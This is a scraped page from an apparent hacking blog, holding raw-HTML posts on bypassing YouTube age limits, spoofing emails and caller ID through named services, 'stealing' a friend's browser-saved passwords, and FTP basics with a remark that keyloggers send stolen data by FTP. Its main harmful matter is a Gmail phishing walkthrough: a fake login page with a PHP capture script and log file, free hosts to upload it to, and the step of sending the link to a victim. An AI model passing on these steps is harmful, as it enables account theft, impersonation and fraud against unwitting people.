src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8ZXKR8u823zp7LX2Ec2oN7D_cN2AK3ZhpzGlegjgwmgek8CgXq-7wHV3FkiH71WxogrgemjLAFP5STojQjlZIyyNnGbAvjaD9ZPmwhJgaX0z_flEeD9vIjtI0i-e7EIfJn4ngQMz_0Aw1/s320/youtube_logo.png" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" width="320" /></a></div> There may be situations when you may get stucked in watching 18+ videos without registration. Here is a simple solution to bypass that. In this article i will show you how to bypass youtube restriction.<br /><span class="Apple-style-span" style="color: blue;"><b>Step 1:</b></span><br /><div> <br /><div> On the video you want to view, get the video code from the URL.</div> <div> <br /></div> <div> <div> Example:</div> <div> <br /></div> <div> http://www.youtube.com/watch?v=O07u7KdRVo0</div> </div> <div> <br /></div> <div> <div> <b>O07u7KdRVo0</b> would be the video code in this case.</div> <div> <br /></div> <div> <b><span class="Apple-style-span" style="color: blue;">Step 2</span></b></div> <div> <br /></div> <div> Now add the video code to the following link:</div> <div> <br /></div> <div> http://www.youtube.com/v/*<b>VIDEO CODE HERE</b>*?fs=1&amp</div> <div> <br /></div> <div> becomes</div> <div> <br /></div> <div> http://www.youtube.com/v/O07u7KdRVo0?fs=1&</div> <div> <br /></div> <div> <b><span class="Apple-style-span" style="color: blue;">Step 3</span></b></div> <div> <br /></div> <div> Now, go to that link and you will be able to view it without logging in or being over 18<br /><br />Hope you liked this article, feel free to leave your comments for further doubts and clarifications.</div> </div> </div> </div> </div> </div>

Youtube hack to watch 18+ videos

There may be situations when you may get stucked in watching 18+ videos without registration. Here is a simple solution to bypass...

Read more »

Email spoofing-An Art of Sending Fake Emails

<div dir="ltr" style="text-align: left;" trbidi="on"> <div class="posthead" style="background-color: white; clear: left; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 12px; line-height: 17px; padding-top: 8px; position: relative;"> <h1 style="font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 28px; margin: 0px; padding: 0px 0px 10px;"> <br /></h1> </div> <div style="background-color: white; clear: left; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 17px;"> </div> <div class="post-body entry-content" style="background-color: white; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 17px;"> <div dir="ltr" trbidi="on"> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhn6JPRm1uXKt3Mpz-HYhHwMaOL_jYFnWgDHzIN9wvpS8QByD_L7Qmd4JkRJKjySQeC21mlfdGhyvrijC1lyTlqcbijSkSps7dhgyVXIP_idCGl3ARUyiZrGTPPqAeQJeQtqA5rIIV1ZBlK/s1600/emailspoofing.jpg" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhn6JPRm1uXKt3Mpz-HYhHwMaOL_jYFnWgDHzIN9wvpS8QByD_L7Qmd4JkRJKjySQeC21mlfdGhyvrijC1lyTlqcbijSkSps7dhgyVXIP_idCGl3ARUyiZrGTPPqAeQJeQtqA5rIIV1ZBlK/s1600/emailspoofing.jpg" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" /></a></div> <br /><b>What is Email Spoofing?</b><br /><br />Email spoofing is an act of sending an email from an email which does not belong to you.<br /><br />If a user receives a phishing email from XYZ@gmail.com, he may not believe in it. But, if that mail is from billgates@microsoft.com we will believe it for sure.<br />This is called email spoofing.<br /><br /><b>How to spoof emails:</b><br />There are two methods to send fake emails.<br /><br /><b>1)Open relay servers</b><br /><br /><b>2)web scripts</b><br /><b><br /></b><br /><b>METHOD 1:</b><br />An open relay server is an SMTP server.<br />A user can connect it via telnet and send emails from anybody's email id without knowing his password.<br /><br /><b>METHOD 2:</b><br />We can send fake emails by using some mail sending functions supported by languages such as PHP and ASP.<br />There are so many websites on internet that contain these mail sending scripts.<br />You can use the following website's services to send fake emails.<br /><br />www.anonymizer.in<br /><br /><br /><span style="color: red;">NOTE: Don't do any illegal activities with that site. You can be traced.</span><br /><br />Hope you liked it. If you have any doubts or suggestions leave your comments.</div> </div> </div>

Email spoofing-An Art of Sending Fake Emails

What is Email Spoofing? Email spoofing is an act of sending an email from an email which does not belong to you. If a user receiv...

Read more »

How to hack gmail using phishing.

<div dir="ltr" style="text-align: left;" trbidi="on"> <div class="posthead" style="background-color: white; clear: left; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 12px; line-height: 17px; padding-top: 8px; position: relative;"> <h1 style="font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 28px; margin: 0px; padding: 0px 0px 10px;"> <br /></h1> </div> <div style="background-color: white; clear: left; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 17px;"> </div> <div class="post-body entry-content" style="background-color: white; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 17px;"> <div dir="ltr" trbidi="on"> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaRhM-qxgufjXjoMJt02fkWECsGImMTI5m87wmf6s9yu5JczPCm2x46mRmdsZ58I54ytIOdGJ4sFdVU0lU7q4s2cpnM1WHwBC8Kaf7YBpiWaamQJkv1Dpejo_UyQMJ5HlcB1lXt05ZavAU/s1600/Password-Phishing-Scams.jpg" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaRhM-qxgufjXjoMJt02fkWECsGImMTI5m87wmf6s9yu5JczPCm2x46mRmdsZ58I54ytIOdGJ4sFdVU0lU7q4s2cpnM1WHwBC8Kaf7YBpiWaamQJkv1Dpejo_UyQMJ5HlcB1lXt05ZavAU/s400/Password-Phishing-Scams.jpg" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" width="400" /></a></div> <br />In my previous post,i have explained the basic concept of Phishing like What is phishing,how it works. If you didn't read it, you can read it from<a href="http://hackinginception.blogspot.com/2011/09/what-is-phishing.html" style="border: 0px; color: #0033cc; text-decoration: none;"> here.</a><br /><br />Here i will show how to hack gmail passwords using<a href="http://hackinginception.blogspot.com/2011/09/what-is-phishing.html" style="border: 0px; color: #0033cc; text-decoration: none;"> phishing.</a><br /><br /><b>Things required:</b><br />1)gmail.html (fake login page)<br />2)mail.php    (to capture the login details)<br />3)log.txt        (to store the captured details)<br />  You can download them from <a href="http://www.ziddu.com/download/15681512/Gmail.com.rar.html" style="border: 0px; color: #0033cc; text-decoration: none;">here</a><br /><br /><b>Procedure:</b><br />step1: create an account in any free web hosting site like<br />              www.110mb.com<br />              www. t35.com<br />              www. ripway.com<br />              www. my3gb.com<br />step2: Now upload all the three files you have downloaded.(I have taken www.my3gb.com)<br /><div class="separator" style="clear: both; text-align: center;"> </div> step 3: Give the link of the fake page to your victim.<br />eg: <b>www.yoursitename.my3gb.com/gmail.html</b><br />step 4:when he clicks the link, it opens a fake gmail page where he enters his login details. When he clicks sign         in button,his login details will be stored in log.txt file.<br /><b><br /></b><br /><b>Demonstration:</b><br />Here i have uploaded my scripts on to www.my3gb.com<br /><div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEyMukMkeUcGIvNbLam-fEEfKWbLsJ3vAJMMxCvzlQOyksjQGLYLW5nfIX_OGiM5PIdf91sLNDggW8GoNDtPOL81alOYCCRITatCAx1LJzq-KPvNcYeSz5dxkXAH8EVodCL-Zyt5BD89b0/s1600/h2.png" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEyMukMkeUcGIvNbLam-fEEfKWbLsJ3vAJMMxCvzlQOyksjQGLYLW5nfIX_OGiM5PIdf91sLNDggW8GoNDtPOL81alOYCCRITatCAx1LJzq-KPvNcYeSz5dxkXAH8EVodCL-Zyt5BD89b0/s400/h2.png" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" width="400" /></a></div> and i clicked the gmail.html link.<br />A fake page was opened where i entered my login details.<br /><div class="separator" style="clear: both; text-align: center;"> </div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeFJdravAQW1EM9cJ53e0KuNiKUUvHf8k_ztywOSFbjEavrAvlG73pHQqEvZzEz1qRqRciRlzkrd71j87qf8koT9b11SNeR4lEjr4v2vaTR_jkP9hnzFLQ3FZUH0qNTzE1H7rGueM5wyN3/s1600/1.png" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeFJdravAQW1EM9cJ53e0KuNiKUUvHf8k_ztywOSFbjEavrAvlG73pHQqEvZzEz1qRqRciRlzkrd71j87qf8koT9b11SNeR4lEjr4v2vaTR_jkP9hnzFLQ3FZUH0qNTzE1H7rGueM5wyN3/s400/1.png" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" width="400" /></a></div> Now my login details were captured by the php script and stored in log.txt file as shown in the figure below.<br /><div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd2h-n47ZAoSy3P6ysjX9LvJsA_BRpUjHrKqXOvO_mYvazAebKMvBqIOusB73e8D5n7xrtlgKyocqfVKDbrdU3NgkX5gI8Q-DKXXPHL4kg6sTGuBT3Un9XBfnrwyu8JoPTVYl0bKVqCQ3S/s1600/hm.png" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd2h-n47ZAoSy3P6ysjX9LvJsA_BRpUjHrKqXOvO_mYvazAebKMvBqIOusB73e8D5n7xrtlgKyocqfVKDbrdU3NgkX5gI8Q-DKXXPHL4kg6sTGuBT3Un9XBfnrwyu8JoPTVYl0bKVqCQ3S/s400/hm.png" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" width="400" /></a></div> <br /><br /><div class="separator" style="clear: both; text-align: center;"> </div> <br /><br />Hope you liked this article. For further doubts and clarifications leave your comments.</div> </div> </div>

How to hack gmail using phishing.

In my previous post,i have explained the basic concept of Phishing like What is phishing,how it works. If you didn't read it,...

Read more »

Call spoofing-hide your identity

<div dir="ltr" style="text-align: left;" trbidi="on"> <div class="posthead" style="background-color: white; clear: left; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 12px; line-height: 17px; padding-top: 8px; position: relative;"> <h1 style="font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 28px; margin: 0px; padding: 0px 0px 10px;"> <br /></h1> </div> <div style="background-color: white; clear: left; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 17px;"> </div> <div class="post-body entry-content" style="background-color: white; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 17px;"> <div dir="ltr" trbidi="on"> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdkYcHZ6j9VKO9q_LnDolOMLs-8HwVSERHoNjGk_es3ltwIU8iCCWfutJZO3ZG2TYHupb9NQkIUmAcyomXorXm0qC3AWaXUXC9dhwF3RFYESUhQXAM2uSN4x8rHsSFAaS4uj1Wl3UJyW0J/s1600/Spoof_a_phone_call.jpg" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdkYcHZ6j9VKO9q_LnDolOMLs-8HwVSERHoNjGk_es3ltwIU8iCCWfutJZO3ZG2TYHupb9NQkIUmAcyomXorXm0qC3AWaXUXC9dhwF3RFYESUhQXAM2uSN4x8rHsSFAaS4uj1Wl3UJyW0J/s1600/Spoof_a_phone_call.jpg" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <br /></div> <div class="separator" style="clear: both;"> </div> <div class="separator" style="clear: both;"> <b>What is call spoofing?</b></div> <div class="separator" style="clear: both;"> Hiding your original number to the receiver of your call can be called as call spoofing. i.e you can use it to call anyone using anybode else's number.</div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> 1. Open http://www.crazycall.net</div> <div class="separator" style="clear: both; text-align: center;"> </div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA9wZn-4PXfNe5uBc_niDqjJ3iCLQ1b11ne561uQpFAdhI54iQrD6ktKl740O2yxTC0LZjYiEnqqr2ofBicQ3MTBZp7dBTHEBd48ck1FFKXYdD6Og22ME_szH9cuHWhW3l_Ezc7FEy3ZS6/s1600/sms+spoofing.JPG" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA9wZn-4PXfNe5uBc_niDqjJ3iCLQ1b11ne561uQpFAdhI54iQrD6ktKl740O2yxTC0LZjYiEnqqr2ofBicQ3MTBZp7dBTHEBd48ck1FFKXYdD6Og22ME_szH9cuHWhW3l_Ezc7FEy3ZS6/s1600/sms+spoofing.JPG" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" /></a></div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> 2. Select your country and wait for the page to load.</div> <div class="separator" style="clear: both;"> 3. Enter the number you want to display in the first big box.</div> <div class="separator" style="clear: both;"> 4. Enter the number you wish to call in</div> <div class="separator" style="clear: both;">    second big box.</div> <div class="separator" style="clear: both;"> 5. Choose voice pitch as normal (for same</div> <div class="separator" style="clear: both;"> voice) or high or low pitch to change your</div> <div class="separator" style="clear: both;"> voice.</div> <div class="separator" style="clear: both;"> 6. Click Get me a code.</div> <div class="separator" style="clear: both;"> 7. Dial the number shown on right and</div> <div class="separator" style="clear: both;"> enter the shown code when asked.</div> <div class="separator" style="clear: both;"> (Remember its not free)</div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> Note:please don't use it for illegal things.</div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> Hope you liked it. comments are encouraged.</div> </div> </div> </div>

Call spoofing-hide your identity

What is call spoofing? Hiding your original number to the receiver of your call can be called as call spoofing. i.e you ca...

Read more »

Steal passwords saved by the browsers

<div dir="ltr" style="text-align: left;" trbidi="on"> <div class="posthead" style="background-color: white; clear: left; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 12px; line-height: 17px; padding-top: 8px; position: relative;"> <h1 style="font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 28px; margin: 0px; padding: 0px 0px 10px;"> <br /></h1> </div> <div style="background-color: white; clear: left; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 17px;"> </div> <div class="post-body entry-content" style="background-color: white; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 17px;"> <div dir="ltr" trbidi="on"> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs2lHeOF3tM0a0ED7KAKJusgjqtR64luXmUatH-WenuL2hkmgdiwMnmvFYV6xWrXgqn1RSuG5S_LSWK8mU6ljBYg-MpEMlcdlGwUwmsMCB9nbXgamNu7bR9hRwd58S9V638ZilyDYMOc6e/s1600/istockphoto_11824877-thief-cartoon.jpg" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="307" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs2lHeOF3tM0a0ED7KAKJusgjqtR64luXmUatH-WenuL2hkmgdiwMnmvFYV6xWrXgqn1RSuG5S_LSWK8mU6ljBYg-MpEMlcdlGwUwmsMCB9nbXgamNu7bR9hRwd58S9V638ZilyDYMOc6e/s320/istockphoto_11824877-thief-cartoon.jpg" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" width="320" /></a></div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> </div> <div class="separator" style="clear: both;"> If you remember, your browser asks you to "remember password" everytime you login to any website.</div> <div class="separator" style="clear: both;"> We can steal those passwords that are saved by the browsers.</div> <div class="separator" style="clear: both;"> This trick will only work if your friend has saved his password, it allowes you to have a look at all the Username and Password which your friend had asked my computer to remember. </div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> NOTE:This is only possible in Mozila Firefox and google chrome.</div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> To steal the browser Password, you only need even less than a minute and you can have a quick look at your friends Usernames and Passwords.</div> <div class="separator" style="clear: both;"> Just follow the steps:</div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> </div> <div class="separator" style="clear: both;"> <b>For Mozila Firefox:</b></div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> 1.Open Mozila Firefox</div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> 2.Goto Tools -> Options</div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> 3.In that goto security -> Passwords.</div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> 4.There you will find View Saved Passwords Button Click on it.</div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> 5.It will show you a list of websites with the usernames. To get the Passwords Click on Show Passwords Button.</div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> 6.You can get pass of any account just look for the site name whose password you want to hack and on the right side you will get the Username and Password.</div> <br /><div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> <b>For Google chrome:</b></div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> 1.Open Google chrome</div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> 2.Goto settings -> Options</div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> 3.Goto Personal stuff -> Manage saved passwords.</div> <div class="separator" style="clear: both;"> Thus you can steal the passwords saved by the browsers.</div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> Hope you liked it. Feel free to make a comment.</div> </div> </div> </div>

Steal passwords saved by the browsers

If you remember, your browser asks you to "remember password" everytime you login to any website. We can steal t...

Read more »

What is FTP-Know The Basics

<div dir="ltr" style="text-align: left;" trbidi="on"> <div class="posthead" style="background-color: white; clear: left; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 12px; line-height: 17px; padding-top: 8px; position: relative;"> <h1 style="font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 28px; margin: 0px; padding: 0px 0px 10px;"> <br /></h1> </div> <div style="background-color: white; clear: left; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 17px;"> </div> <div class="post-body entry-content" style="background-color: white; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 17px;"> <div dir="ltr" trbidi="on"> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJTlq3UoOGiYOzldKNXwrVJiQUOUDDKLCcUlv6eJM1QAE6rvfLtS8XPJP8jN0t_VFPOsBHlyjibA21Ga_M0S94NDO6AIJ2CNQeR_O5QhvEp3XdN7rEJ7MP80EM_w2-DEOFuTSMF0bblIkx/s1600/ftp.jpg" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJTlq3UoOGiYOzldKNXwrVJiQUOUDDKLCcUlv6eJM1QAE6rvfLtS8XPJP8jN0t_VFPOsBHlyjibA21Ga_M0S94NDO6AIJ2CNQeR_O5QhvEp3XdN7rEJ7MP80EM_w2-DEOFuTSMF0bblIkx/s400/ftp.jpg" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" width="400" /></a></div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> <b><span class="Apple-style-span" style="color: red; font-size: medium;">What is FTP?</span></b></div> <div class="separator" style="clear: both;"> <b><span class="Apple-style-span" style="color: red; font-size: medium;"><br /></span></b></div> <div class="separator" style="clear: both;"> </div> <div class="separator" style="clear: both;"> File Transfer Protocol (FTP) is a standard Internet protocol for transmitting files between computers on the Internet. </div> <div class="separator" style="clear: both;"> Like the Hypertext Transfer Protocol (HTTP), which transfers displayable Web pages and related files, and the Simple Mail Transfer Protocol (SMTP), which transfers e-mail, FTP is an application protocol that uses the Internet's TCP(Transmission Control Protocol)/IP protocols.</div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF2NLBTgmLVTYOnbxnGyVMM3kXi3wh7I32LxQ4CJ7HayZJirDb0f641g5jebwUsM6pkys9diQB7jGz7oySeWUHGoHn2PNanzENVYVLuFDTiQKXJHqmJ7vybgPc7cQ9ojhD1DfO7yjWWoFz/s1600/ftp.gif" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF2NLBTgmLVTYOnbxnGyVMM3kXi3wh7I32LxQ4CJ7HayZJirDb0f641g5jebwUsM6pkys9diQB7jGz7oySeWUHGoHn2PNanzENVYVLuFDTiQKXJHqmJ7vybgPc7cQ9ojhD1DfO7yjWWoFz/s400/ftp.gif" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" width="400" /></a></div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> </div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> Very briefly, FTP (File Transfer Protocol) is used to transfer programs or other information from one computer to another. </div> <div class="separator" style="clear: both;"> This simple tool will let you do many things: download software, upload your own web pages, transfer information between your home and work machines, and more. </div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> FTP uses the port no 21 on your computer.</div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> </div> <div class="separator" style="clear: both;"> <b><span class="Apple-style-span" style="color: red; font-size: medium;">What is Anonymous FTP???</span></b></div> <div class="separator" style="clear: both;"> <b><span class="Apple-style-span" style="color: red; font-size: medium;"><br /></span></b></div> <div class="separator" style="clear: both;"> Anonymous FTP is used to download software from computers where you do not have your personal account.</div> <div class="separator" style="clear: both;"> If you are accessing internet from a local service provider, you may use anonymous FTP to get recommended software, help files, or other handy information.</div> <div class="separator" style="clear: both;"> Publicly available files are easily accessed using anonymous FTP.</div> <div class="separator" style="clear: both;"> <b><span class="Apple-style-span" style="color: red; font-size: medium;"><br /></span></b></div> <div class="separator" style="clear: both;"> <b><span class="Apple-style-span" style="color: red; font-size: medium;">Uses of  FTP:</span></b></div> <div class="separator" style="clear: both;"> <b><span class="Apple-style-span" style="color: red; font-size: medium;"><br /></span></b></div> <div class="separator" style="clear: both;"> As a user, you can use FTP with a simple command line interface (for example, from the Windows MS-DOS Prompt window) or with a commercial program that offers a graphical user interface. </div> <div class="separator" style="clear: both;"> Your Web browser can also make FTP requests to download programs you select from a Web page.</div> <div class="separator" style="clear: both;"> For example, If you've ever clicked on a link to download the newest version of your favorite web browser, then you may have already used anonymous FTP. </div> <div class="separator" style="clear: both;"> Downloading files with your web browser is certainly the easiest way to use FTP, although it does have its limitations.</div> <div class="separator" style="clear: both; text-align: center;"> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSN7KvhIUhqtmdtiGa2ZiiStXlp9wfENKQ_qgE2W-2Q0__4rXN-uTLvwJt72c9vdxzGNS4VH2uLg2u5dqREG5zIhr1Dul9x1kiIyLgkesu6BvEmGj0NnFZ9PilGe3m3THDJU01px6YKR__/s1600/ftp-exp.jpg" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSN7KvhIUhqtmdtiGa2ZiiStXlp9wfENKQ_qgE2W-2Q0__4rXN-uTLvwJt72c9vdxzGNS4VH2uLg2u5dqREG5zIhr1Dul9x1kiIyLgkesu6BvEmGj0NnFZ9PilGe3m3THDJU01px6YKR__/s400/ftp-exp.jpg" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" width="360" /></a></div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> </div> <div class="separator" style="clear: both;"> <b><span class="Apple-style-span" style="color: red; font-size: medium;">When do you need a Separate FTP??</span></b></div> <div class="separator" style="clear: both;"> <b><span class="Apple-style-span" style="color: red; font-size: medium;"><br /></span></b></div> <div class="separator" style="clear: both;"> You need a seperate program for FTP, if you want to download all the files in a given directory. A good FTP client makes this much easier.</div> <div class="separator" style="clear: both;"> You will also need it for uploading and downloading files from your personal directory( while making your own webpage).</div> <div class="separator" style="clear: both;"> <br /></div> <div class="separator" style="clear: both;"> <b><span class="Apple-style-span" style="color: red; font-size: medium;">How does it help hackers??</span></b></div> <div class="separator" style="clear: both;"> <b><span class="Apple-style-span" style="color: red; font-size: medium;"><br /></span></b></div> <div class="separator" style="clear: both;"> Hackers can create their own FTP accounts to log the information of their victims secretly.</div> <div class="separator" style="clear: both;"> Remote installation keyloggers are the best example for this. The data stolen by the keyloggers will be sent to the hacker via FTP and email. FTP can carry large amount of data too. </div> <div> <br /></div> <div> <b><span class="Apple-style-span" style="color: red;">About the author:</span></b><b><span class="Apple-style-span" style="color: red;"> </span></b>This is a guest post by <b><span class="Apple-style-span" style="color: blue;">ANUSHA MANNE</span> </b>who is interested in new technologies and wants to share knowledge with my blog readers. Usually writes articles related to<span class="Apple-style-span" style="color: blue;"><b> latest technologies</b></span> at <span class="Apple-style-span" style="font-family: arial, sans-serif; font-size: 13px;"><a href="http://www.anushamanne.blogspot.com/" style="border: 0px; color: #0033cc; text-decoration: none;"><b>Techie Talk</b></a></span></div> <br /><br /><div class="separator" style="clear: both;"> </div> <div class="separator" style="clear: both;"> <br /></div> <div> Hope you liked it. If you have any doubts or suggestions, leave a comment.</div> </div> </div> </div>

What is FTP-Know The Basics

What is FTP? File Transfer Protocol (FTP) is a standard Internet protocol for transmitting files between computers on th...

Read more »

Hack websites using Cross Site Scripting

